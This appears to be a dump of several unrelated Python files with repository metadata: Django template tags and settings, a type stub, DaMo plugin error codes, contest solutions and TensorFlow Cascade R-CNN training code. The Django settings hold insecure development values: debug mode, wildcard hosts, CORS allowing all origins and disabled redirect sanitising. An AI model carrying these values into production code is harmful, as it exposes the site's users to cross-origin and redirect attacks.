# Whatever is between {% raw %} and {% endraw %} will be preserved as
# raw, unrendered template code.
text = []
parse_until = 'endraw'
tolog("in raw tag")
tag_mapping = {
template.TOKEN_TEXT: ('', ''),
template.TOKEN_VAR: ('{{', '}}'),
template.TOKEN_BLOCK: ('{%', '%}'),
template.TOKEN_COMMENT: ('{#', '#}'),
}
# By the time this template tag is called, the template system has already
# lexed the template into tokens. Here, we loop over the tokens until
# {% endraw %} and parse them to TextNodes. We have to add the start and
# end bits (e.g. "{{" for variables) because those have already been
# stripped off in a previous part of the template-parsing process.
while parser.tokens:
token = parser.next_token()
if token.token_type == template.TOKEN_BLOCK and token.contents == parse_until:
return template.TextNode(u''.join(text))
start, end = tag_mapping[token.token_type]
text.append(u'%s%s%s' % (start, token.contents, end))
parser.unclosed_block_tag(parse_until)
raw = register.tag(raw)
class VerbatimNode(template.Node):
def __init__(self, text):
self.text = text
def render(self, context):
return self.text
def verbatim(parser, token):
text = []
while 1:
token = parser.tokens.pop(0)
if token.contents == 'endverbatim':
break
if token.token_type == template.TOKEN_VAR:
text.append('{{')
elif token.token_type == template.TOKEN_BLOCK:
text.append('{%')
text.append(token.contents)
if token.token_type == template.TOKEN_VAR:
text.append('}}')
elif token.token_type == template.TOKEN_BLOCK:
text.append('%}')
return VerbatimNode(''.join(text))
verbatim = register.tag(verbatim)
def google_anal_account():
return settings.GOOGLE_ANAL_ACCOUNT
def www_host():
return settings.WWW_HOST
def fb_app_id():
return settings.FB_API_KEY
register.simple_tag(google_anal_account)
register.simple_tag(www_host)
register.simple_tag(fb_app_id)
| UTF-8 | Python | false | false | 2,456 | py | 256 | util_tags.py | 172 | 0.619707 | 0.618893 | 0 | 84 | 28.238095 | 86 |
friendlywhales/lineup-web | 13,554,916,819,735 | 03e418d102519b3d0fb405af44a27dcbb8caa459 | b066191ce947eb7ca4acebd021070ee46eae4d05 | /backend/apiserver/settings.py | 8135742c0fa2c9e35d61fec3c9eb2cd8977112eb | []
| no_license | https://github.com/friendlywhales/lineup-web | 17624b8c17678eb1abd380fa603d5559ece83115 | ed06227b14a57791449a4c134c5a0955fc5b9f27 | refs/heads/master | 2022-12-04T20:08:13.482782 | 2020-09-01T07:59:49 | 2020-09-01T07:59:49 | 291,615,047 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os
from corsheaders.defaults import default_headers
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = ''
DEBUG = True
ALLOWED_HOSTS = ['*']
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_mysql',
'rest_framework',
'rest_framework.authtoken',
'dry_rest_permissions',
'silk',
'drf_yasg',
'corsheaders',
'social_django',
'accounts',
'currencies',
'contents',
'messaging',
'operations',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'accounts.social.middlewares.SocialAuthExceptionMiddleware',
'silk.middleware.SilkyMiddleware',
]
ROOT_URLCONF = 'apiserver.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'apiserver.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': '',
'USER': '',
'PASSWORD': '',
'OPTIONS': {
'charset': 'utf8mb4',
},
'HOST': '127.0.0.1',
'PORT': '23306',
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'accounts.User'
LANGUAGE_CODE = 'ko-kr'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), 'staticfiles')
AUTHENTICATION_BACKENDS = (
'steemconnect.backends.SteemConnectOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'DEFAULT_AUTHENTICATION_CLASSES': (
# 'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
),
'TEST_REQUEST_DEFAULT_FORMAT': 'json',
'DEFAULT_PAGINATION_CLASS': 'apiserver.helpers.rest_framework.paginations.DefaultCursorPaginationClass',
'PAGE_SIZE': 4,
}
MAX_USER_PROMOTION_CODE_NUMBER = 3
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), 'uploads')
MEDIA_URL = '/media/'
CORS_ORIGIN_ALLOW_ALL = True # only for DEBUG mode
# CORS_ORIGIN_WHITELIST = (
# 'line-up.me',
# 'localhost:8080',
# 'localhost:8081',
# 'localhost:8082',
# )
CORS_EXPOSE_HEADERS = [
'LineUp-Total-Number',
'LineUp-Page-Next-Link',
'LineUp-Page-Previous-Link',
]
SOCIAL_AUTH_PIPELINE = (
'social_core.pipeline.social_auth.social_details',
'social_core.pipeline.social_auth.social_uid',
'social_core.pipeline.social_auth.auth_allowed',
# 'social_core.pipeline.social_auth.social_user',
'accounts.social.pipeline.steem.social_user',
'social_core.pipeline.user.get_username',
'social_core.pipeline.social_auth.associate_by_email',
'social_core.pipeline.user.create_user',
'accounts.social.pipeline.issue_signup_point',
'social_core.pipeline.social_auth.associate_user',
'social_core.pipeline.debug.debug',
'social_core.pipeline.social_auth.load_extra_data',
'social_core.pipeline.user.user_details',
'social_core.pipeline.debug.debug',
'accounts.social.pipeline.steem.user_info',
)
NICKNAME_LENGTH_RANGE = (2, 50, )
SOCIAL_AUTH_STEEMCONNECT_KEY = 'lineup.app'
SOCIAL_AUTH_STEEMCONNECT_DEFAULT_SCOPE = ['vote', 'comment']
LOGIN_REDIRECT_URL = '/social-auth/login/done/'
STEEMCONNECT_SOCIAL_AUTH_RAISE_EXCEPTIONS = True
SOCIAL_AUTH_RAISE_EXCEPTIONS = True
RAISE_EXCEPTIONS = True
SOCIAL_AUTH_SANITIZE_REDIRECTS = False
FRONT_HOSTNAME = 'http://127.0.0.1:8084'
FRONTEND_LOGIN_REDIRECT_URL = f'{FRONT_HOSTNAME}/social-auth/login/done'
FRONTEND_LOGIN_URL = f'{FRONT_HOSTNAME}/login'
INACTIVE_USER_URL = f'{FRONT_HOSTNAME}/login?status=inactive-user'
LOGIN_ERROR_URL = f'{FRONT_HOSTNAME}/login?status=error'
# SESSION_COOKIE_DOMAIN = "127.0.0.1"
# DEFAULT_USER_LEVEL = 'associate' # 회원 가입시 기본 등급
DEFAULT_USER_LEVEL = 'author' # 6월 2일 only 전 한정.
DEFAULT_ASSET_REDIRECT_CACHE = 60 * 60 * 24
CORS_ALLOW_CREDENTIALS = False
CORS_ALLOW_HEADERS = default_headers + (
'access-control-allow-origin',
'access-control-allow-credentials',
)
CSRF_TRUSTED_ORIGINS = ['beta.line-up.me', 'www.line-up.me', 'line-up.me']
FILE_UPLOAD_PERMISSIONS = 0o644
SERVICE_ROOT_USERNAME = 'lineup'
SERVICE_TOKEN_SYMBOL = 'lineup'
LIMITATION_POINT_PER_DAY = 1_000
AVAILABLE_DELETION_PERIOD = 7 # days
MINIMUM_IMAGE_SIZE = 500 # px.
# AMAZON S3 settings---------------------------------------------------
AWS_STORAGE_BUCKET_NAME = 'lineup-user-assets'
AWS_ACCESS_KEY_ID = None
AWS_SECRET_ACCESS_KEY = None
AWS_REGION = 'ap-northeast-2'
AWS_S3_HOST = f's3-{AWS_REGION}.amazonaws.com'
S3_USE_SIGV4 = True
AWS_S3_FILE_OVERWRITE = False
AWS_S3_KEY_PREFIX = 'uploads'
# DEFAULT_FILE_STORAGE = 'apiserver.storages.aws_s3.MediaStorage'
AWS_S3_URL_EXPIRIATION = 60 * 60 * 24 * 30 # seconds
DATA_UPLOAD_MAX_MEMORY_SIZE = 1024 * 1024 * 8
FCM_API_KEY = os.environ['LINEUP_FCM_APIKEY']
# celery settings---------------------------------------------------
CELERY_BROKER_URL = 'redis://localhost:26379/0'
CELERY_RESULT_BACKEND = 'redis://localhost:26379/2'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TASK_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Asia/Seoul'
CELERY_BEAT_SCHEDULE = {
}
BEZANT_ENDPOINT = 'testnet'
BEZANT_APIKEY = os.environ.get('BEZANT_APIKEY')
FRONTEND_PATH = os.path.join(
os.path.dirname(BASE_DIR), 'frontend', 'production-dist',
)
| UTF-8 | Python | false | false | 6,912 | py | 196 | settings.py | 130 | 0.669378 | 0.653399 | 0 | 266 | 24.87594 | 108 |
AsymmetricVentures/mypy-django | 9,440,338,167,999 | 6bdc0fcb841b438d6597fcef20480cb446f3a419 | 7942342d457276bb266228d0236af647b3d55477 | /django/utils/synch.pyi | ede96fb9f738a990f466541050a1b8acaa2a6c48 | [
"MIT"
]
| permissive | https://github.com/AsymmetricVentures/mypy-django | 847c4e521ce4dec9a10a1574f9c32b234dafd00b | f6e489f5cf5672ecede323132665ccc6306f50b8 | refs/heads/master | 2020-06-30T01:53:44.434394 | 2016-12-22T22:45:50 | 2016-12-22T22:45:50 | 74,397,884 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Stubs for django.utils.synch (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from typing import Any
class RWLock:
mutex = ... # type: Any
can_read = ... # type: Any
can_write = ... # type: Any
active_readers = ... # type: int
active_writers = ... # type: int
waiting_readers = ... # type: int
waiting_writers = ... # type: int
def __init__(self) -> None: ...
def reader_enters(self): ...
def reader_leaves(self): ...
def reader(self): ...
def writer_enters(self): ...
def writer_leaves(self): ...
def writer(self): ...
| UTF-8 | Python | false | false | 629 | pyi | 404 | synch.pyi | 404 | 0.578696 | 0.575517 | 0 | 21 | 28.952381 | 75 |
a1403951401/PyDaMo | 11,407,433,172,134 | 079f6fd86973155e3cb16931dd2ac39e6513766f | 6ff56a0d34ef5d3577852f39ec400208d5046855 | /DaMo/err.py | a4fe498f177e82aaf11cdc6f9b905b36b5c2fd96 | []
| no_license | https://github.com/a1403951401/PyDaMo | d4c3536cd5855682950d286ec6db8d23412a3701 | a880758ec28ff6c51920e302c3c30f20084da146 | refs/heads/master | 2020-08-25T08:22:13.128489 | 2019-10-22T06:30:41 | 2019-10-22T06:30:41 | 216,986,996 | 4 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 请求错误的类型
class VIP_Err(Exception):
code = {
-1: "无法连接网络, (可能防火墙拦截, 如果可以正常访问大漠插件网站,那就可以肯定是被防火墙拦截)",
-2: "进程没有以管理员方式运行.(出现在win7 win8 vista 2008.建议关闭uac)",
0: "失败(未知错误)",
1: "大漠注册成功",
2: "余额不足",
3: "绑定了本机器,但是账户余额不足50元.",
4: "注册码错误",
5: "你的机器或者IP在黑名单列表中或者不在白名单列表中",
6: "非法使用插件",
7: "你的帐号因为非法使用被封禁. (如果是在虚拟机中使用插件,必须使用Reg或者RegEx,不能使用RegNoMac或者RegExNoMac, 否则可能会造成封号,或者封禁机器)",
8: "ver_info不在你设置的附加白名单中",
77: "机器码或者IP因为非法使用,而被封禁. (如果是在虚拟机中使用插件,必须使用Reg或者RegEx,不能使用RegNoMac或者RegExNoMac, 否则可能会造成封号,或者封禁机器)封禁是全局的,如果使用了别人的软件导致77,也一样会导致所有注册码均无法注册。解决办法是更换IP,更换MAC",
-8: "版本附加信息长度超过了20",
-9: "版本附加信息里包含了非法字母",
}
def __init__(self, messge):
if messge in self.code:
self.leng = self.code[messge]
else:
self.leng = messge
def __str__(self):
return self.leng
| UTF-8 | Python | false | false | 1,585 | py | 10 | err.py | 9 | 0.598691 | 0.569248 | 0 | 27 | 32.962963 | 161 |
recuraki/PythonJunkTest | 16,535,624,092,381 | 155485641ed77e32116d99460907bb3787bfe9ff | 4a8c1f7d9935609b780aff95c886ef7781967be0 | /atcoder/_codeforces/1359_b.py | 3a9bbb603bd1f49ffcf55d202be404d0821ed4c6 | []
| no_license | https://github.com/recuraki/PythonJunkTest | d5e5f5957ac5dd0c539ef47759b1fe5ef7a2c52a | 2556c973d468a6988d307ce85c5f2f8ab15e759a | refs/heads/master | 2023-08-09T17:42:21.875768 | 2023-07-18T23:06:31 | 2023-07-18T23:06:31 | 13,790,016 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
from io import StringIO
import unittest
import logging
logging.basicConfig(level=logging.DEBUG)
def resolve():
from pprint import pprint
import sys
q = int(input())
for _ in range(q):
n, m, x, y = map(int, input().split())
maze = []
for i in range(n):
s = input()
maze.append(list(s))
if x * 2 <= y: # 1x1 is best!
cnt = 0
for i in range(n):
cnt += maze[i].count(".")
print(cnt * x)
else: # 1x2 can use
cost = 0
for i in range(n):
j = 0
while j < m:
if maze[i][j] == "*":
j += 1
continue
nj = j + 1
if nj >= m:
cost += x # use 1x1
j += 1
continue
if maze[i][nj] == ".": # use 1x2
cost += y
j += 2
continue
cost += x
j += 1
print(cost)
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_input_1(self):
print("test_input_1")
input = """5
1 1 10 1
.
1 2 10 1
..
2 1 10 1
.
.
3 3 3 7
..*
*..
.*.
3 3 7 3
...
...
..."""
output = """10
1
20
18
30"""
self.assertIO(input, output)
if __name__ == "__main__":
unittest.main() | UTF-8 | Python | false | false | 1,789 | py | 1,170 | 1359_b.py | 1,143 | 0.406372 | 0.376188 | 0 | 81 | 21.098765 | 59 |
Aasthaengg/IBMdataset | 10,651,518,894,575 | e073dbedb29021f87d5224dd1c78aaa0e64e11bf | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02632/s292618205.py | e3e76f22e4c3ca5583413714aa64de5463e69964 | []
| no_license | https://github.com/Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
input = sys.stdin.readline
K = int(input())
S = list(input())[: -1]
N = len(S)
mod = 10 ** 9 + 7
class Factorial:
def __init__(self, n, mod):
self.f = [1]
for i in range(1, n + 1):
self.f.append(self.f[-1] * i % mod)
self.i = [pow(self.f[-1], mod - 2, mod)]
for i in range(1, n + 1)[: : -1]:
self.i.append(self.i[-1] * i % mod)
self.i.reverse()
def factorial(self, i):
return self.f[i]
def ifactorial(self, i):
return self.i[i]
def combi(self, n, k):
return self.f[n] * self.i[n - k] % mod * self.i[k] % mod
f = Factorial(N + K + 1, mod)
res = 0
for l in range(K + 1):
r = K - l
res += f.combi(l + N - 1, l) * pow(25, l, mod) % mod * pow(26, r, mod) % mod
res %= mod
print(res) | UTF-8 | Python | false | false | 749 | py | 202,060 | s292618205.py | 202,055 | 0.523364 | 0.492657 | 0 | 31 | 23.193548 | 78 |
smallsunsun1/Cascade-RCNN | 9,457,518,015,982 | ccab8b9ce5ac7e58f22c1233b7d4c36ca6818e65 | 3f4467e4501e8cee2c22d31784b05b10acee2fb7 | /train.py | 1dbb4537f9355e8903ee297586d901e2dfe79280 | []
| no_license | https://github.com/smallsunsun1/Cascade-RCNN | 7babbefd22d3be506773dc2204612c58b21f059e | 7a0bc01bddb4547523f8b490e4a16cdd4c77d746 | refs/heads/master | 2020-12-03T12:40:16.743165 | 2020-02-07T15:08:34 | 2020-02-07T15:08:34 | 231,319,366 | 7 | 4 | null | null | null | null | null | null | null | null | null | null | null | null | null | import argparse
import numpy as np
import tensorflow as tf
import os
import cv2
import json
import re
import time
from tensorflow import keras
from tensorflow.contrib import distribute
from config.config import _C
from model import model_frcnn
from model.basemodel import resnet_c4_backbone, resnet_conv5, resnet_fpn_backbone
from model.model_rpn import rpn_head, generate_rpn_proposals, rpn_losses, RPNHead
from model.model_fpn import fpn_model, generate_fpn_proposals, multilevel_roi_align, multilevel_rpn_losses, \
slice_feature_and_anchors
from model.model_box import RPNAnchors, clip_boxes, roi_align, decoded_output_boxes
from model.model_frcnn import BoxProposals, FastRCNNHead, fastrcnn_outputs, fastrcnn_predictions, \
sample_fast_rcnn_targets, fastrcnn_predictions_v2
from model.model_cascade import CascadeRCNNHead
from util.common import image_preprocess
from util.data import tf_get_all_anchors, tf_get_all_anchors_fpn
from util.data_loader import input_fn, test_input_fn, eval_input_fn
tf.logging.set_verbosity(tf.logging.INFO)
def map_boxes_back(boxes, features):
h_pre = features['h_pre']
w_pre = features['w_pre']
h_now = features['h_now']
w_now = features['w_now']
scale = features['scale']
if scale > 1:
true_h = w_now / scale
pad_h_top = (h_now - true_h) // 2
pad_w_left = 0
true_w = w_now
else:
true_w = h_now * scale
pad_w_left = (w_now - true_w) // 2
pad_h_top = 0
true_h = h_now
boxes[:, 0] = boxes[:, 0] - pad_w_left
boxes[:, 1] = boxes[:, 1] - pad_h_top
boxes[:, 2] = boxes[:, 2] - pad_w_left
boxes[:, 3] = boxes[:, 3] - pad_h_top
boxes[:, 0] = boxes[:, 0] / true_w * w_pre
boxes[:, 1] = boxes[:, 1] / true_h * h_pre
boxes[:, 2] = boxes[:, 2] / true_w * w_pre
boxes[:, 3] = boxes[:, 3] / true_h * h_pre
return boxes
def resnet_c4_model_fn(features, labels, mode, params):
"""parameter defination part"""
is_train = (mode == tf.estimator.ModeKeys.TRAIN)
resnet_num_blocks = params["RESNET_NUM_BLOCKS"]
num_anchors = params["num_anchors"]
head_dim = params["head_dim"]
resolution = params["resolution"]
num_classes = params["num_classes"]
bbox_reg_weights = params["bbox_reg_weights"]
weight_decay = params["weight_decay"]
learning_rate = params["learning_rate"]
lr_schedule = params["lr_schedule"]
"""model definition part"""
image = image_preprocess(features['image'])
featuremap = resnet_c4_backbone(image, resnet_num_blocks[:3], is_train)
image_shape2d = tf.shape(image)[1:3]
rpn_label_logits, rpn_box_logits = rpn_head(featuremap, head_dim, num_anchors)
if mode != tf.estimator.ModeKeys.PREDICT:
anchors = RPNAnchors(tf_get_all_anchors(), features['anchor_labels'], features['anchor_boxes'])
else:
anchors = RPNAnchors(tf_get_all_anchors(), None, None)
anchors = anchors.narrow_to(featuremap)
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits) # x1y1x2y2
proposals, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
_C.RPN.TRAIN_PRE_NMS_TOPK if mode == tf.estimator.ModeKeys.TRAIN else _C.RPN.TEST_PRE_NMS_TOPK,
_C.RPN.TRAIN_POST_NMS_TOPK if mode == tf.estimator.ModeKeys.TRAIN else _C.RPN.TEST_POST_NMS_TOPK)
# rpn_size = tf.shape(proposals)[0]
# rpn_boxes = tf.gather(proposals, tf.where(tf.greater(proposals, 0.5)))
proposals = BoxProposals(proposals)
if mode != tf.estimator.ModeKeys.PREDICT:
rpn_loss = rpn_losses(anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
# targets = [features[k] for k in ['boxes', 'gt_labels', 'gt_masks'] if k in features.keys()]
# gt_boxes, gt_labels, *_ = targets
gt_boxes = features['boxes']
gt_labels = features['gt_labels']
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
boxes_on_featuremap = proposals.boxes * (1.0 / _C.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, resolution)
feature_fastrcnn = resnet_conv5(roi_resized, resnet_num_blocks[-1], is_train)
# Keep C5 feature to be shared with mask branch
feature_gap = keras.layers.GlobalAveragePooling2D()(feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(feature_gap, num_classes)
bbox_reg_weights_tensor = tf.convert_to_tensor(bbox_reg_weights, tf.float32)
if mode != tf.estimator.ModeKeys.PREDICT:
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, bbox_reg_weights_tensor)
all_loss = fastrcnn_head.losses()
label_scores = tf.nn.softmax(fastrcnn_label_logits)
decoded_boxes = decoded_output_boxes(proposals, num_classes, fastrcnn_box_logits, bbox_reg_weights_tensor)
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d)
final_boxes, final_scores, final_labels, valid_detections = fastrcnn_predictions_v2(decoded_boxes, label_scores)
# final_boxes, final_scores, final_labels = fastrcnn_predictions(decoded_boxes, label_scores)
global_step = tf.train.get_or_create_global_step()
if mode != tf.estimator.ModeKeys.PREDICT:
trainable_weights = tf.trainable_variables()
weight_loss = 0.0
for i, ele in enumerate(trainable_weights):
if re.search('.*/kernel', ele.name):
weight_loss += tf.reduce_sum(tf.square(ele) * weight_decay)
total_cost = tf.add_n(rpn_loss + all_loss, 'total_cost')
tf.summary.scalar('total_cost', total_cost)
if is_train:
learning_rate = tf.train.piecewise_constant(global_step, lr_schedule,
values=[tf.convert_to_tensor(0.01 * 0.33, tf.float32)] + [
learning_rate * (0.1 ** i) for i in
range(len(lr_schedule))])
opt = tf.train.MomentumOptimizer(learning_rate, 0.9)
# opt = tf.train.AdamOptimizer(learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = opt.minimize(total_cost, global_step)
return tf.estimator.EstimatorSpec(mode, loss=total_cost, train_op=train_op)
else:
return tf.estimator.EstimatorSpec(mode, loss=total_cost)
else:
predictions = {'boxes': final_boxes[0, :valid_detections[0]],
'labels': final_labels[0, :valid_detections[0]],
'scores': final_scores[0, :valid_detections[0]],
'image': features['image'],
# 'rpn_boxes': rpn_boxes,
# 'rpn_size': rpn_size,
'valid_detection': valid_detections}
return tf.estimator.EstimatorSpec(mode, predictions)
def resnet_fpn_model_fn(features, labels, mode, params):
"""parameter definition part"""
is_train = (mode == tf.estimator.ModeKeys.TRAIN)
resnet_num_blocks = params["RESNET_NUM_BLOCKS"]
num_anchors = params["num_anchors"]
head_dim = params["head_dim"]
resolution = params["resolution"]
num_classes = params["num_classes"]
bbox_reg_weights = params["bbox_reg_weights"]
weight_decay = params["weight_decay"]
learning_rate = params["learning_rate"]
lr_schedule = params["lr_schedule"]
"""model definition part"""
image = image_preprocess(features["image"])
c2345 = resnet_fpn_backbone(image, resnet_num_blocks, is_train)
p23456 = fpn_model(c2345)
image_shape2d = tf.shape(image)[1:3]
all_anchors_fpn = tf_get_all_anchors_fpn()
model_rpn_head = RPNHead(_C.FPN.NUM_CHANNEL, len(_C.RPN.ANCHOR_RATIOS))
rpn_outputs = [model_rpn_head(pi) for pi in p23456]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
#debug_op = tf.print({"debug_inf": tf.convert_to_tensor("now in here")})
#with tf.control_dependencies([debug_op]):
# image_shape2d = tf.identity(image_shape2d)
if mode != tf.estimator.ModeKeys.PREDICT:
multilevel_anchors = [RPNAnchors(all_anchors_fpn[i], features['anchor_labels_lvl{}'.format(i + 2)],
features['anchor_boxes_lvl{}'.format(i+2)]) for i in range(len(all_anchors_fpn))]
else:
multilevel_anchors = [RPNAnchors(all_anchors_fpn[i], None,
None) for i in range(len(all_anchors_fpn))]
slice_feature_and_anchors(p23456, multilevel_anchors)
# Multi-Level RPN Proposals
multilevel_pred_boxes = [anchor.decode_logits(logits) for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(multilevel_pred_boxes, multilevel_label_logits, image_shape2d, is_train)
proposals = BoxProposals(proposal_boxes)
gt_boxes = None
gt_labels = None
if mode != tf.estimator.ModeKeys.PREDICT:
losses = multilevel_rpn_losses(multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
gt_boxes = features['boxes']
gt_labels = features['gt_labels']
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, _C.FPN.FRCNN_HEAD_FUNC)
if not _C.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(p23456[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func(roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(head_feature, num_classes)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.convert_to_tensor(bbox_reg_weights, tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(p23456[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, num_classes, mode != tf.estimator.ModeKeys.PREDICT)
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d)
label_scores = fastrcnn_head.output_scores()
# final_boxes, final_scores, final_labels = fastrcnn_predictions(decoded_boxes, label_scores)
final_boxes, final_scores, final_labels, valid_detections = fastrcnn_predictions_v2(decoded_boxes, label_scores)
global_step = tf.train.get_or_create_global_step()
if mode != tf.estimator.ModeKeys.PREDICT:
all_losses = fastrcnn_head.losses()
trainable_weights = tf.trainable_variables()
weight_loss = 0.0
for i, ele in enumerate(trainable_weights):
if re.search('.*/kernel', ele.name):
weight_loss += tf.reduce_sum(tf.square(ele) * weight_decay)
#print_op = tf.print({'rpn_loss': tf.add_n(losses),
# 'frcnn_loss': tf.add_n(all_losses)})
#with tf.control_dependencies([print_op]):
total_cost = tf.add_n(losses + all_losses, "total_cost")
total_cost = tf.add(total_cost, weight_loss, 'all_total_cost')
if is_train:
learning_rate = tf.train.piecewise_constant(global_step, lr_schedule,
values=[tf.convert_to_tensor(0.01 * 0.33 * 0.375, tf.float32)] + [
learning_rate * (0.1 ** i) for i in
range(len(lr_schedule))])
tf.summary.scalar("learning_rate", learning_rate)
opt = tf.train.MomentumOptimizer(learning_rate, 0.9)
# opt = tf.train.AdamOptimizer(learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
print(update_ops)
with tf.control_dependencies(update_ops):
train_op = opt.minimize(total_cost, global_step)
return tf.estimator.EstimatorSpec(mode, loss=total_cost, train_op=train_op)
else:
return tf.estimator.EstimatorSpec(mode, loss=total_cost)
else:
predictions = {'boxes': final_boxes[0, :valid_detections[0]],
'labels': final_labels[0, :valid_detections[0]],
'scores': final_scores[0, :valid_detections[0]],
'image': features['image'],
'original_image': features['original_image'],
'h_pre': features['h_pre'],
'w_pre': features['w_pre'],
'h_now': features['h_now'],
'w_now': features['w_now'],
'scale': features['scale'],
'image_id': features.get('image_id', tf.convert_to_tensor(0)),
'valid_detection': valid_detections}
# predictions = {'boxes': final_boxes,
# 'labels': final_labels,
# 'scores': final_scores,
# 'image': features['image'],
# 'original_image': features['original_image'],
# 'h_pre': features['h_pre'],
# 'w_pre': features['w_pre'],
# 'h_now': features['h_now'],
# 'w_now': features['w_now'],
# 'scale': features['scale'],
# 'image_id': features.get('image_id', tf.convert_to_tensor(0))
# }
return tf.estimator.EstimatorSpec(mode, predictions)
model_dict = {"rpn": resnet_c4_model_fn,
"fpn": resnet_fpn_model_fn}
# input = tf.placeholder(dtype=tf.float32, shape=[None, None, 3],
# name="input")
# input = tf.squeeze(input, axis=0)
def serve_input_fn():
string_input_data = tf.placeholder(dtype=tf.string, shape=(), name="input")
string_input = tf.io.decode_base64(string_input_data)
input = tf.image.decode_jpeg(string_input)
image_shape = tf.shape(input)
shape2d = image_shape[:2]
h = shape2d[0]
w = shape2d[1]
scale = tf.cast(w / h, tf.float32)
SHORT_IMAGE_EDGE = 800
def true_fn(h, w):
scale = tf.cast(h / w, tf.float32)
new_w = SHORT_IMAGE_EDGE
new_h = tf.minimum(new_w * scale // 32 * 32, 1312)
return tf.cast(new_h, tf.int32), tf.cast(new_w, tf.int32)
def false_fn(h, w):
scale = tf.cast(w / h, tf.float32)
new_h = SHORT_IMAGE_EDGE
new_w = tf.minimum(new_h * scale // 32 * 32, 1312)
return tf.cast(new_h, tf.int32), tf.cast(new_w, tf.int32)
new_height, new_width = tf.cond(tf.greater(h, w), lambda: true_fn(h, w), lambda: false_fn(h, w))
image = tf.image.resize_image_with_pad(input, new_height, new_width)
features = {}
features['image'] = tf.expand_dims(image, 0)
features['image'].set_shape([1, None, None, 3])
features['original_image'] = image_shape
features['h_pre'] = h
features['w_pre'] = w
features['h_now'] = new_height
features['w_now'] = new_width
features['scale'] = scale
